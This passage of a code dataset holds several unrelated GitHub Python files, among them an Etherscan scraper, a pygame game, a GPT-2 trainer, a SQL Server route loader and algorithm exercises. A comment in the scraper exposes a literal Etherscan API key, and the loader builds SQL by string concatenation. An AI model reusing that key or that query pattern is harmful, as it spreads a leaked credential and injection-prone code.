_request_one(addr,save_path):\r\n url = base_url + apikey + \"&address=\" + addr\r\n request = urllib.request.Request(url)\r\n reponse = urllib.request.urlopen(request, timeout=10).read() # 10s timeout\r\n r = json.loads(reponse.decode('utf-8'))\r\n\r\n if r['status'] == '1' and r['message'] == 'OK':\r\n with open(os.path.join(save_path, addr), 'w') as fw:\r\n fw.write(json.dumps(r))\r\n fw.close()\r\n\r\n # Proxy == 1\r\n r = r['result'][0]\r\n if r['Proxy'] == '1' and r['Implementation'] != '':\r\n _request_one(r['Implementation'],save_path)\r\n\r\n elif r['status'] == '0' and r['message'] == 'NOTOK':\r\n if r['result'] == \"Max rate limit reached\":\r\n print('Max rate limit reached')\r\n _request_one(addr,save_path)\r\n else:\r\n print(addr,json.dumps(r))\r\n\r\nif __name__ == \"__main__\":\r\n \r\n #path = token['20'].path\r\n path = token['721'].path\r\n #path 
= token['1155'].path\r\n\r\n q = Queue(5)\r\n\r\n p1 = Process(target=producer,args=(q,path))\r\n\r\n c1 = Process(target=consumer,args=(q, path))\r\n c2 = Process(target=consumer, args=(q, path))\r\n c3 = Process(target=consumer, args=(q, path))\r\n c4 = Process(target=consumer, args=(q, path))\r\n c5 = Process(target=consumer, args=(q, path))\r\n\r\n tasks = [p1,c1,c2,c3,c4,c5]\r\n [t.start() for t in tasks]\r\n\r\n p1.join()\r\n q.put(None)\r\n q.put(None)\r\n q.put(None)\r\n q.put(None)\r\n q.put(None)\r\n print('finish')\r\n\r\n #crytic-compile '0x009c43b42aefac590c719e971020575974122811' --export-dir 'tokens' --etherscan-apikey 99111UXSQPVIU93JMZIHC3ZNFN4JQGDJ77 --etherscan-only-source-code","repo_name":"d0scoo1/Naga","sub_path":"tools/etherscan_spider/2_raw_request.py","file_name":"2_raw_request.py","file_ext":"py","file_size_in_byte":2820,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"28879084506","text":"import pygame\nimport os\n\npygame.font.init()\n\nWIDTH, HEIGHT = 1920, 1080\nWIN = pygame.display.set_mode((WIDTH,HEIGHT))\npygame.display.set_caption(\"First Game\")\n\nWHITE = (255,255,255)\nBLACK = (0, 0, 0)\nRED = (255, 0, 0)\nYELLOW = (255, 255, 0)\n\nHEALTH_FONT = pygame.font.SysFont('comicsans', 50)\n\nROUND_HIT = pygame.USEREVENT + 1\nSQUARE_HIT = pygame.USEREVENT + 2\n\nFPS = 60\nVELOCITY = 20\n\nBORDER = pygame.Rect(WIDTH//2, 0, 10, HEIGHT)\nBULLET_VEL = 16\nMAX_BULLETS = 3\n\nFACE_W, FACE_H = 100, 100\n\nROUNDFACE = pygame.image.load(os.path.join('Assets', 'happysad.png'))\nROUNDFACE = pygame.transform.scale(ROUNDFACE, (FACE_W,FACE_H))\n\nSQUAREFACE = pygame.image.load(os.path.join('Assets', 'square.png'))\nSQUAREFACE = pygame.transform.scale(SQUAREFACE, (FACE_W,FACE_H))\n\nBACKGROUND = pygame.transform.scale(pygame.image.load(os.path.join('Assets', 'BackGround.png')), (WIDTH,HEIGHT))\n\n\ndef draw_window(round, square, round_bullets, square_bullets, round_health, square_health):\n WIN.blit(BACKGROUND,(0,0))\n pygame.draw.rect(WIN, BLACK, BORDER)\n\n round_health_text = HEALTH_FONT.render(\"Health: \" + str(round_health), 1, WHITE)\n\n square_health_text = HEALTH_FONT.render(\"Health: \" + str(square_health), 1, WHITE)\n\n WIN.blit(round_health_text, (WIDTH - round_health_text.get_width() - 10, 10))\n WIN.blit(square_health_text, (10,10))\n WIN.blit(ROUNDFACE, (round.x,round.y))\n WIN.blit(SQUAREFACE, (square.x,square.y))\n \n for bullet in round_bullets:\n pygame.draw.rect(WIN, RED, bullet)\n for bullet in square_bullets:\n pygame.draw.rect(WIN, YELLOW, bullet)\n pygame.display.update()\n\n\ndef roundMovement(keys_pressed, round):\n if keys_pressed[pygame.K_a] and round.x - VELOCITY > 0:\n round.x -= VELOCITY\n if keys_pressed[pygame.K_d] and round.x + VELOCITY + round.width < BORDER.x:\n round.x += VELOCITY\n if keys_pressed[pygame.K_w] and round.y - VELOCITY > 0:\n round.y -= VELOCITY\n if keys_pressed[pygame.K_s] and round.y + VELOCITY + round.height < HEIGHT - 60:\n round.y += VELOCITY\n\n\n\ndef squareMovement(keys_pressed, square):\n if keys_pressed[pygame.K_LEFT] and square.x - VELOCITY > BORDER.x + BORDER.width:\n square.x -= VELOCITY\n if keys_pressed[pygame.K_RIGHT] and square.x + VELOCITY + square.width < WIDTH:\n square.x += VELOCITY\n if keys_pressed[pygame.K_UP] and square.y - VELOCITY > 0:\n square.y -= VELOCITY\n if keys_pressed[pygame.K_DOWN] and square.y + VELOCITY + square.height < HEIGHT - 60:\n square.y += VELOCITY\n\n\ndef handle_bullets(round_bullets, square_bullets, round, 
square):\n for bullet in round_bullets:\n bullet.x += BULLET_VEL\n if square.colliderect(bullet):\n pygame.event.post(pygame.event.Event(SQUARE_HIT))\n round_bullets.remove(bullet)\n elif bullet.x > WIDTH:\n round_bullets.remove(bullet)\n\n for bullet in square_bullets:\n bullet.x -= BULLET_VEL\n if round.colliderect(bullet):\n pygame.event.post(pygame.event.Event(ROUND_HIT))\n square_bullets.remove(bullet)\n elif bullet.x < 0:\n square_bullets.remove(bullet)\n\n\ndef main():\n round = pygame.Rect(300,100,FACE_W, FACE_H)\n square = pygame.Rect(1300,100,FACE_W, FACE_H)\n\n bullets = []\n round_bullets = []\n square_bullets = []\n\n round_health = 10\n square_health = 10\n\n clock = pygame.time.Clock()\n run = True\n while run:\n\n clock.tick(FPS)\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n run = False\n \n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_LCTRL and len(round_bullets) < MAX_BULLETS:\n bullet = pygame.Rect(\n round.x + round.width, round.y + round.height//2 - 2, 10, 5)\n round_bullets.append(bullet)\n\n if event.key == pygame.K_RCTRL and len(square_bullets) < MAX_BULLETS:\n bullet = pygame.Rect(\n square.x, square.y + square.height//2 - 2, 10, 5)\n square_bullets.append(bullet)\n\n if event.type == SQUARE_HIT:\n round_health -= 1\n \n if event.type == ROUND_HIT:\n square_health -= 1\n \n winner_text = \"\"\n if round_health <= 0:\n winner_text = \"Square wins\"\n\n if square_health <= 0:\n winner_text = \"Round wins\"\n\n if winner_text != \"\":\n pass\n\n\n keys_pressed = pygame.key.get_pressed()\n roundMovement(keys_pressed, round)\n squareMovement(keys_pressed, square)\n\n handle_bullets(round_bullets,square_bullets, round, square)\n\n draw_window(round, square, round_bullets, square_bullets, round_health, square_health)\n\n pygame.quit()\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Dorfultariant/SampleGame","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4900,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"8269689940","text":"import sys\n\nn = int(input())\narray = [0]\nfor _ in range(n):\n array.append(int(sys.stdin.readline()))\n\ndp = [0] * (n + 1)\nfor i in range(1, n + 1):\n if i == 1:\n dp[i] = array[1]\n elif i == 2:\n dp[i] = array[1] + array[2]\n else:\n dp[i] = max(dp[i - 1], dp[i - 2] + array[i], dp[i - 3] + array[i - 1] + array[i])\n\nprint(dp[n])","repo_name":"s2lee/PS","sub_path":"BOJ/Dynamic Programming/2156.py","file_name":"2156.py","file_ext":"py","file_size_in_byte":356,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"23769125626","text":"from typing import Dict\n\nimport torch.cuda\nfrom torch.utils.data import DataLoader\nfrom torch import nn, Tensor, optim\nfrom tqdm import tqdm\nimport json\nimport torch\nimport time\nfrom models.gpt2_prompt_models import SpanStopPredictor\nfrom gpt2_prompt_predictor import Predictor\nfrom loggers.csv_logger import CSVLogger\n\n\nclass SpanOnlyTrainer:\n def __init__(self,\n tokenizer,\n gpt2: nn.Module,\n span_predictor: nn.Module,\n span_optimizer: optim.Optimizer,\n span_loss_name: str,\n span_loss: nn.Module,\n stop_as_negative_span: bool,\n train_span_only_csv_file_path: str,\n eval_span_only_csv_file_path: str,\n evaluation_scores_file_path: str,\n eval_frequency: int):\n self.tokenizer = tokenizer\n self.gpt2 = gpt2\n self.span_predictor = span_predictor\n self.span_optimizer = span_optimizer\n self.span_loss = 
span_loss\n self.predictor = Predictor(tokenizer, gpt2, SpanStopPredictor(self.span_predictor), span_predictor, span_loss_name)\n self.stop_as_negative_span = stop_as_negative_span\n self.train_csv_logger = CSVLogger(train_span_only_csv_file_path, None)\n self.eval_csv_logger = CSVLogger(eval_span_only_csv_file_path, None)\n self.evaluation_scores_file_path = evaluation_scores_file_path\n self.eval_frequency = eval_frequency\n\n def train_span(self, encoded_prompt: Dict[str, Tensor], true_spans: list, evaluate: bool):\n output = self.gpt2(encoded_prompt)\n pred_span = self.span_predictor(output)\n\n span_losses = [self.span_loss(pred_span[0], true_span.float()) for true_span in true_spans]\n span_loss, min_index = min((val, idx) for (idx, val) in enumerate(span_losses))\n if torch.cuda.is_available():\n span_loss.to('cuda:0', non_blocking=True)\n\n if not evaluate:\n self.gpt2.zero_grad()\n self.span_optimizer.zero_grad()\n span_loss.backward()\n self.span_optimizer.step()\n\n \"\"\"\n self.gpt2.zero_grad()\n self.span_optimizer.zero_grad()\n a1 = [x.clone() for x in self.gpt2.parameters()] + [x.clone() for x in self.span_predictor.parameters()]\n span_loss.backward()\n self.span_optimizer.step()\n b1 = [x.clone() for x in self.gpt2.parameters()] + [x.clone() for x in self.span_predictor.parameters()]\n for a, b in zip(a1, b1):\n x = torch.equal(a,b)\n y = torch.equal(a.data,b.data)\n if not x:\n print(x)\n if not y:\n print(y)\n \"\"\"\n\n return span_loss, pred_span[0], min_index\n\n def do_epoch(self, dataset: DataLoader, epoch: int, csv_logger: CSVLogger, evaluate: bool):\n for text_id, anchor_id, prep_id, prompt, spans in dataset:\n if torch.cuda.is_available():\n spans = spans.to('cuda:0', non_blocking=True)\n\n if type(prompt) == tuple:\n # weird bug, sometimes prompt is returned as tuple\n assert prompt[0] and len(prompt) == 1\n prompt = prompt[0]\n\n spans_to_check = list(spans[0]) # Or 1?\n while len(spans_to_check):\n encoded_input = self.tokenizer(prompt, return_tensors='pt')\n if torch.cuda.is_available():\n encoded_input = encoded_input.to('cuda:0')\n\n span_loss, pred_span, span_checked_index = self.train_span(encoded_input, spans_to_check, evaluate)\n span_checked = spans_to_check[span_checked_index]\n\n span_start, span_end = span_checked[0].item(), span_checked[1].item()\n pred_start, pred_end = pred_span[0].item(), pred_span[1].item()\n csv_logger.log_span(epoch, text_id[0], anchor_id[0], prep_id[0],\n span_start, span_end,\n pred_start, pred_end,\n span_loss.item())\n del spans_to_check[span_checked_index]\n\n prompt += f' ({span_checked[0].item()},{span_checked[1].item()})'\n\n if self.stop_as_negative_span:\n encoded_input = self.tokenizer(prompt, return_tensors='pt')\n end_span = -torch.ones(2)\n\n if torch.cuda.is_available():\n encoded_input = encoded_input.to('cuda:0')\n end_span = end_span.to('cuda:0')\n end_span.unsqueeze(0).repeat(spans.shape[0], 1)\n\n span_loss, pred_span, span_checked_index = self.train_span(encoded_input, [end_span], evaluate)\n span_checked = spans_to_check[span_checked_index]\n\n span_start, span_end = span_checked[0].item(), span_checked[1].item()\n pred_start, pred_end = pred_span[0].item(), pred_span[1].item()\n csv_logger.log_span(epoch, text_id[0], anchor_id[0], prep_id[0],\n span_start, span_end,\n pred_start, pred_end,\n span_loss.item())\n\n def train(self, train_dataset: DataLoader, eval_ds_for_loss: DataLoader, eval_ds_for_metrics: DataLoader, epochs: int):\n epochs_progress_bar = tqdm(range(epochs))\n 
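# track dev-set F1 per epoch so the best checkpoint can be reported after training\n        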
evaluation_labeled_f1_per_epoch = []\n evaluation_unlabeled_f1_per_epoch = []\n for epoch in epochs_progress_bar:\n self.span_predictor.train()\n self.gpt2.train()\n epochs_progress_bar.set_description(\"Epoch %d\" % (epoch+1))\n\n print(f\"SpanOnly_trainer - training on train dataset... epoch {epoch+1}\")\n start = time.time()\n self.do_epoch(train_dataset, epoch, self.train_csv_logger, False)\n end = time.time()\n print(f\"SpanOnly_trainer - training epoch {epoch+1} took {end-start} seconds\")\n\n with torch.no_grad():\n self.span_predictor.eval()\n self.gpt2.eval()\n\n print(f\"SpanOnly_trainer - evaluating loss on dev dataset... after epoch {epoch + 1}\")\n start = time.time()\n self.do_epoch(eval_ds_for_loss, epoch, self.eval_csv_logger, True)\n end = time.time()\n print(f\"SpanOnly_trainer - evaluation loss after epoch {epoch + 1} took {end - start} seconds\")\n\n if self.stop_as_negative_span and ((epoch + 1) % self.eval_frequency == 0):\n print(f\"SpanOnly_trainer (with stop_as_negative_span) - evaluating metrics on dev dataset... after epoch {epoch+1}\")\n start = time.time()\n _, scores = self.predictor.predict(eval_ds_for_metrics)\n end = time.time()\n print(f\"SpanOnly_trainer (with stop_as_negative_span) - evaluation metrics on dev dataset after epoch {epoch + 1} took {end - start} seconds\")\n\n print(f\"SpanOnly_trainer (with stop_as_negative_span) - scores on dev dataset after epoch {epoch + 1}: {scores}\")\n with open(self.evaluation_scores_file_path, \"a\") as f:\n f.write(f\"After span-only training epoch {epoch+1}: {json.dumps(scores)}\\n\")\n evaluation_labeled_f1_per_epoch.append(scores['labeled_f1'])\n evaluation_unlabeled_f1_per_epoch.append(scores['unlabeled_f1'])\n \n if epochs > 0 and self.stop_as_negative_span and evaluation_labeled_f1_per_epoch:\n best_epoch_for_labeled_f1 = evaluation_labeled_f1_per_epoch.index(max(evaluation_labeled_f1_per_epoch)) + 1\n best_epoch_for_unlabeled_f1 = evaluation_unlabeled_f1_per_epoch.index(max(evaluation_unlabeled_f1_per_epoch)) + 1\n with open(self.evaluation_scores_file_path, \"a\") as f:\n f.write(f\"Best epoch for labeled f1 after span-only training: {best_epoch_for_labeled_f1}\\n\")\n f.write(f\"Best epoch for unlabeled f1 after span-only training: {best_epoch_for_unlabeled_f1}\\n\")\n","repo_name":"shimooper/TNE_GPT2","sub_path":"trainers/span_only_trainer.py","file_name":"span_only_trainer.py","file_ext":"py","file_size_in_byte":8205,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"7385712811","text":"import pygame\nfrom pygame.math import Vector2\n\nimport random\n\nclass Particles:\n def __init__(self, sizeRange, posRange, circle=False, speed=10, accel=Vector2(0, 0), collision=False, colors=None):\n self.sizeRange, self.posRange = sizeRange, posRange\n self.circle, self.speed, self.accel, self.collision = circle, speed, accel, collision\n if colors is None: self.colors = [(255,255,255)]\n else: self.colors = tuple(colors)\n\n # Data for particles\n self.pos = []\n self.siz = [] # Radius\n self.vel = []\n self.col = []\n\n def draw(self, win, scroll=Vector2(0, 0)):\n if self.circle:\n for i in range(len(self.pos)):\n pygame.draw.circle(win, self.colors[self.col[i]], self.pos[i]-scroll, self.siz[i])\n else:\n for i in range(len(self.pos)):\n pygame.draw.rect(win, self.colors[self.col[i]], \\\n (self.pos[i].x - self.siz[i] - scroll.x, \\\n self.pos[i].y - self.siz[i] - scroll.y, \\\n self.siz[i] * 2, self.siz[i] * 2))\n\n def update(self, delta, tilemap=None, 
colRects=None):\n if colRects is None: colRects = []\n for i in range(len(self.pos))[::-1]:\n self.vel[i] += self.accel * delta\n\n if self.collision:\n self.pos[i].x += self.vel[i].x * delta\n if tilemap.collidePoint(self.pos[i]) or \\\n any([rect.collidepoint(self.pos[i]) for rect in colRects]):\n self.vel[i].x *= -1\n self.pos[i].x += self.vel[i].x * 2 * delta\n \n self.pos[i].y += self.vel[i].y * delta\n if tilemap.collidePoint(self.pos[i]):\n self.vel[i].y *= -random.uniform(0.75, 1)\n self.pos[i].y += self.vel[i].y * 2 * delta\n else:\n self.pos[i] += self.vel[i] * delta\n\n self.siz[i] -= self.speed * delta\n\n if self.siz[i] < 1:\n self.pos.pop(i)\n self.siz.pop(i)\n self.vel.pop(i)\n self.col.pop(i)\n\n def emit(self, pos, amount, velRange):\n num = amount if amount >= 1 else random.random() > amount\n for i in range(num):\n self.pos.append(pos + Vector2(random.uniform(*self.posRange[:2]), random.uniform(*self.posRange[2:])))\n self.siz.append(random.uniform(*self.sizeRange))\n self.vel.append(Vector2(random.uniform(*velRange[:2]), random.uniform(*velRange[2:])))\n self.col.append(random.randrange(0, len(self.colors)))\n \n def clear(self):\n while len(self.pos):\n self.pos.pop()\n self.siz.pop()\n self.vel.pop()\n self.col.pop()\n\n def collideRect(self, rect):\n for pos in self.pos:\n if rect.collidepoint(pos): return True\n return False","repo_name":"Magicalbat/Pygame-Projects","sub_path":"Metroidvania-Month-15/src/utils/particles.py","file_name":"particles.py","file_ext":"py","file_size_in_byte":2941,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"17334376625","text":"# -*- coding: utf-8 -*-\n\n'''Заполняет БД маршрутами из файлы-справочника типа *.csv\n Читаем строку справочного файла и проверяем аэропорты.\n Если все есть, то смотрим в БД такой маршрут по кодам IATA аэропортов.\n Если такого маршрута нет, добавляем его.\n Прежние маршруты остаются без изменений\n\n --- На больших входных файлах наблюдается постепенная значительная утечка ОЗУ ---\n'''\n\n\nimport pyodbc\nimport pandas\n\n\nmyDriver = \"SQL Server\"\nmyServer = \"Data-Server\"\nmyDataBase = \"AirLines\"\n\n# Открываем соединение с БД. 
Значение AUTOCOMMIT берет из БД (там по-умолчанию FALSE)\ncnxn = pyodbc.connect(driver=myDriver, server=myServer, database=myDataBase)\n\n# Ставим курсор на начало\nseek = cnxn.cursor()\n\n# Читаем справочный файл типа *.csv (UTF-8, шапка таблицы, разделитель - |) и перепаковываем его в DataFrame\n# В исходном файле *.csv подписаны столбцы -> в DataFrame можно пока обращаться к именам столбцов\n\n'''\n# Источник OpenFlights\nDataFrameFromCSV = pandas.read_csv(\"Routes.csv\", sep=\"|\")\nListAirLine = DataFrameFromCSV['AirLine'].tolist()\nListAirPortSource = DataFrameFromCSV['AirPortSource'].tolist() # используется как длина списков\nListAirPortDestination = DataFrameFromCSV['AirPortDestination'].tolist()\nListStops = DataFrameFromCSV['Stops'].tolist()\nListEquipment = DataFrameFromCSV['Equipment'].tolist()'''\n\n# Источник BTSgov\nDataFromCSV = pandas.read_csv(\"1007531840_T_DB1B_COUPON.csv\", sep=\",\")\nListAirPortSource = DataFromCSV['ORIGIN'].tolist()\nListAirPortDestination = DataFromCSV['DEST'].tolist()\n\n# Счетчики\nCount_index = 0\nCountNotChecked = 0\nCountAdded = 0\nCountFailed = 0\n\n# Делаем проход по таблице Если такой уже есть, переходим на следующую строку DataFrame-а\nwhile Count_index < len(ListAirPortSource):\n # Становимся на строку с номером Count_index\n myQueryAirPortSource = \"SELECT * FROM dbo.AirPortsTableNew WHERE AirPortCodeIATA = '\" + str(ListAirPortSource[Count_index]) + \"'\"\n seek.execute(myQueryAirPortSource)\n ResultSQLQueryAirPortSource = seek.fetchall()\n if not ResultSQLQueryAirPortSource:\n print(\" ... Аэропорта \", str(ListAirPortSource[Count_index]), \" в БД пока нет, добавить маршрут не получится ...\")\n myQueryAirPortDestination = \"SELECT * FROM dbo.AirPortsTableNew WHERE AirPortCodeIATA = '\" + str(ListAirPortDestination[Count_index]) + \"'\"\n seek.execute(myQueryAirPortDestination)\n ResultSQLQueryAirPortDestination = seek.fetchall()\n if not ResultSQLQueryAirPortDestination:\n print(\" ... Аэропорта \", str(ListAirPortDestination[Count_index]), \" в БД пока нет, добавить маршрут не получится ...\")\n if ResultSQLQueryAirPortSource and ResultSQLQueryAirPortDestination:\n # В таблице \"AirRoutesTableNew\" два внешних ключа на один первичный ключ и сделано условие \"AirPortSource\" не равно \"AirPortDestination\"\n myQueryRoute = \"\"\"SELECT dbo.AirRoutesTableNew.AirRouteUniqueNumber AS AIRROUTE,\n dbo.AirPortsTableNew.AirPortName AS DEPARTURE,\n AirPortsTableNew_1.AirPortName AS ARRIVAL,\n dbo.AirRoutesTableNew.CodeShape,\n dbo.AirRoutesTableNew.Stops,\n dbo.AirRoutesTableNew.Equipment,\n dbo.AirPortsTableNew.AirPortCodeIATA AS Departure_IATA,\n AirPortsTableNew_1.AirPortCodeIATA AS Arrival_IATA \n FROM dbo.AirRoutesTableNew INNER JOIN\n dbo.AirPortsTableNew ON dbo.AirRoutesTableNew.AirPortDeparture = dbo.AirPortsTableNew.AirPortUniqueNumber INNER JOIN\n dbo.AirPortsTableNew AS AirPortsTableNew_1 ON dbo.AirRoutesTableNew.AirPortArrival = AirPortsTableNew_1.AirPortUniqueNumber\n WHERE (dbo.AirPortsTableNew.AirPortCodeIATA = '\"\"\" + str(ListAirPortSource[Count_index]) + \"') AND (AirPortsTableNew_1.AirPortCodeIATA = '\" + str(ListAirPortDestination[Count_index]) + \"') COMMIT\"\n try:\n seek.execute(myQueryRoute) # ---- здесь скрипт слетает ---\n except:\n print(\" ... -- условие не проверено --\")\n Count_index += 1\n CountNotChecked += 1\n continue\n ResultSQLQueryRoute = seek.fetchall()\n if ResultSQLQueryRoute:\n # Такой маршрут есть в БД\n print(\"Маршрут есть, не меняем\")\n else:\n # Такого маршрута нет в БД. 
Добавляем его\n print(\"Маршрут в БД не найден, добавляем его\")\n myQueryInsert = \"BEGIN TRANSACTION \"\n myQueryInsert += \"INSERT INTO dbo.AirRoutesTableNew (AirPortDeparture, AirPortArrival, Stops, Equipment) VALUES (\"\n myQueryInsert += \"(SELECT AirPortUniqueNumber FROM dbo.AirPortsTableNew WHERE AirPortCodeIATA = '\" + str(ListAirPortSource[Count_index]) + \"'), \" # nchar(10)\n myQueryInsert += \"(SELECT AirPortUniqueNumber FROM dbo.AirPortsTableNew WHERE AirPortCodeIATA = '\" + str(ListAirPortDestination[Count_index]) + \"'), \" # nchar(10)\n #myQueryInsert += str(ListStops[Count_index]) + \", \" # smallint\n myQueryInsert += \"0, \" # smallint\n #myQueryInsert += \"'\" + str(ListEquipment[Count_index]) + \"')\" # ntext\n myQueryInsert += \"'-+- OpenFlights -+-') \" # ntext\n myQueryInsert += \"COMMIT TRANSACTION \"\n try:\n seek.execute(myQueryInsert)\n CountAdded += 1\n except:\n print(\" ..-- Маршрут не вставился .....\")\n CountFailed += 1\n Count_index += 1\n\n# Если заполение велось с помощью этой обработки, повторов не будет\n\n# Снимаем курсор\nseek.close()\n\n# Заканчиваем висящие транзакции\ncnxn.commit()\n# Закрываем соединение\ncnxn.close()\n\n# Выводим итоги\nprint(\"\\n Итоги:\\n ----\")\nprint(\" Просмотрено \", str(Count_index), \" записей в справочном файле\")\nprint(\" Не проверено \", str(CountNotChecked), \" записей\")\nprint(\" Добавлено \", str(CountAdded), \" авиалиний\")\nprint(\" Не добавлено\", str(CountFailed), \" авиалиний\")\n","repo_name":"tsv19su254052/LoadWorkData-GUIs-and-Utilities","sub_path":"LoadAirRoutesOLD1.py","file_name":"LoadAirRoutesOLD1.py","file_ext":"py","file_size_in_byte":7255,"program_lang":"python","lang":"ru","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"28006456576","text":"from .image import Image\nfrom .cameras import Camera\n\nclass Renderer:\n def __init__(self, camera: Camera, integrator):\n self.camera = camera\n self.integrator = integrator\n\n def render(self, texture: Image) -> None:\n for y in range(texture.height):\n for x in range(texture.width):\n rx, ry = 2.0 * x / (texture.width-1) - 1.0, 2.0 * y / (texture.height-1) - 1.0\n\n ray = self.camera.get_primary_ray(rx, ry)\n texture[x, y] = self.integrator.get_radiance(ray).trim()\n ","repo_name":"pkubiak/sh-dungeon","sub_path":"engine/rt/renderer.py","file_name":"renderer.py","file_ext":"py","file_size_in_byte":557,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"} +{"seq_id":"18956166691","text":"from lib.model import Model\n\nfrom of_switch.of_switch import OpenflowSwitch\nfrom clients.replier import Replier \nfrom clients.sym_exec_sender import SymExecSender\nfrom of_controller.nox_controller import PySwitchController\n\nfrom invariants.no_loop_invariant import NoLoopInvariant\nfrom invariants.strict_direct_route_invariant import StrictDirectRouteInvariant\n\nimport config_parser as config\n\nclass NiceModel(Model):\n generate_inputs = True\n generate_stats = False\n invariants = [NoLoopInvariant, StrictDirectRouteInvariant]\n\n def initTopology(self, topo):\n self.controller = PySwitchController()\n sw1 = OpenflowSwitch(name=\"s1\", port_count=2, of_id=1, expire_entries=config.get(\"model.flow_entry_expiration\"))\n sw2 = OpenflowSwitch(name=\"s2\", port_count=2, of_id=2, expire_entries=config.get(\"model.flow_entry_expiration\"))\n cl1 = SymExecSender(name=\"h1\", mymac=(0x00, 0xBA, 0xAD, 0xF0, 0x0D, 0x01), max_pkts=config.get(\"nice_model.max_pkts\"), 
max_burst=config.get(\"nice_model.max_burst\"))\n cl2 = Replier(name=\"h2\", mymac=(0x00, 0x01, 0x02, 0x03, 0x04, 0x05))\n sw1.initTopology({0: (cl1, 0), 1: (sw2, 0)})\n sw2.initTopology({0: (sw1, 1), 1: (cl2, 0)})\n cl1.initTopology({0: (sw1, 0)})\n cl2.initTopology({0: (sw2, 1)})\n self.clients.append(cl1)\n self.clients.append(cl2)\n self.switches.append(sw1)\n self.switches.append(sw2)\n self.switches_idx[sw1.getOpenflowID()] = sw1\n self.switches_idx[sw2.getOpenflowID()] = sw2\n # start callbacks\n self.controller.start_callbacks.append(lambda: self.controller.install())\n self.controller.start_callbacks.append(lambda: self.controller.addSwitch(sw1))\n self.controller.start_callbacks.append(lambda: self.controller.addSwitch(sw2))\n\n","repo_name":"mcanini/nice","sub_path":"model_checker/models/nice_model.py","file_name":"nice_model.py","file_ext":"py","file_size_in_byte":1818,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"18350343896","text":"import numpy as np\nimport sys\nimport math\nfrom timeit import default_timer as timer\nfrom datetime import timedelta\n\ndef findmaximumcrossingsubarray(A, low, mid, high):\n \"\"\"Find the maximum subarray of A[low] to A[high] crossing index mid.\n\n \"\"\"\n\n #error checks should be here (omitted)\n #e.g. low <= mid <= high\n #what happens if low == mid or high == mid?\n\n leftsum = float('-Inf')\n sum = 0\n for i in range(mid, low-1, -1):\n sum += A[i]\n if (sum > leftsum):\n leftsum = sum\n left = i\n \n rightsum = float('-Inf')\n sum = 0\n for j in range(mid+1, high+1):\n sum += A[j]\n if (sum > rightsum):\n rightsum = sum\n right = j\n \n return left, right, leftsum + rightsum\n\ndef findmaximumsubarray(A, low, high):\n \"\"\"Find the maximum subarray of A[low] to A[high].\n\n Recursive implementation using divide-and-conquer.\n \"\"\"\n\n #error checks should be here (omitted)\n\n if (high > low):\n mid = int(math.floor(high+low)/2)\n leftlow, lefthigh, leftsum = findmaximumsubarray(A,low,mid)\n rightlow, righthigh, rightsum = findmaximumsubarray(A, mid+1, high)\n crosslow, crosshigh, crosssum = findmaximumcrossingsubarray(A, low, mid, high)\n if (leftsum >= rightsum and leftsum >= crosssum):\n return leftlow, lefthigh, leftsum\n elif (rightsum >= crosssum):\n return rightlow, righthigh, rightsum\n else:\n return crosslow, crosshigh, crosssum\n else:\n return low, high, A[low]\n\ndef bruteforcemaximumsubarray(A):\n \"\"\"Find the maximum subarray of A.\n\n Brute force implementation checking all possibilities\n \"\"\"\n\n maxsum = float('-Inf')\n \n for i in range(0, len(A)):\n for j in range(0, len(A)): #could be improved\n sum = 0\n for k in range(i, j+1): #but this omits cases j < i\n sum += A[k]\n \n if sum > maxsum:\n maxsum = sum\n left = i\n right = j\n \n return left, right, maxsum\n \ndef kadanemaximumsubarray(A):\n \"\"\"Find the maximum subarray of A.\n\n Kadane's algorithm\n \"\"\"\n maxsum = float('-Inf')\n bestleft = bestright = 0\n sum = 0\n for right in range(0, len(A)):\n if sum <= 0:\n # Start a new sequence at the current element\n left = right\n sum = A[left]\n else:\n # Extend the existing sequence with the current element\n sum += A[right]\n\n if sum > maxsum:\n maxsum = sum\n bestleft = left\n bestright = right\n\n return bestleft, bestright, maxsum\n \n#main point of entry\nn = 300\nA = np.random.randint(-10,10,n)\n\nstart_time = timer()\n[left, right, sum] = findmaximumsubarray(A, 0, n-1)\nend_time = timer();\nprint(\"Divide-and-conquer time = \", 
timedelta(seconds=end_time-start_time))\n\nbf_start_time = timer()\n[bf_left, bf_right, bf_sum] = bruteforcemaximumsubarray(A);\nbf_end_time = timer()\nprint(\"Brute-force time = \", timedelta(seconds=bf_end_time-bf_start_time))\n\nkadane_start_time = timer()\n[kadane_left, kadane_right, kadane_sum] = kadanemaximumsubarray(A);\nkadane_end_time = timer()\nprint(\"Kadane time = \", timedelta(seconds=kadane_end_time-kadane_start_time))\n\nprint(\"Maximum subarray sum = \", sum, \" from \" , left, \" to \", right)\nprint(\"Maximum brute force subarray sum = \", bf_sum, \" from \" , bf_left, \" to \", bf_right)\nprint(\"Maximum kadane subarray sum = \", kadane_sum, \" from \" , kadane_left, \" to \", kadane_right)\n\n\n\n\n\n\n\n","repo_name":"samib1/Useful-Algorithms","sub_path":"1_MaximumSubarray.py","file_name":"1_MaximumSubarray.py","file_ext":"py","file_size_in_byte":3590,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"18215954092","text":"class Solution:\n def nearestExit(self, maze: List[List[str]], entrance: List[int]) -> int:\n m = len(maze)\n n = len(maze[0])\n dirs = [0, 1, 0, -1, 0]\n ans = 0\n q = collections.deque([(entrance[0], entrance[1])])\n seen = {(entrance[0], entrance[1])}\n\n while q:\n ans += 1\n for _ in range(len(q)):\n i, j = q.popleft()\n for k in range(4):\n x = i + dirs[k]\n y = j + dirs[k + 1]\n if x < 0 or x == m or y < 0 or y == n:\n continue\n if (x, y) in seen or 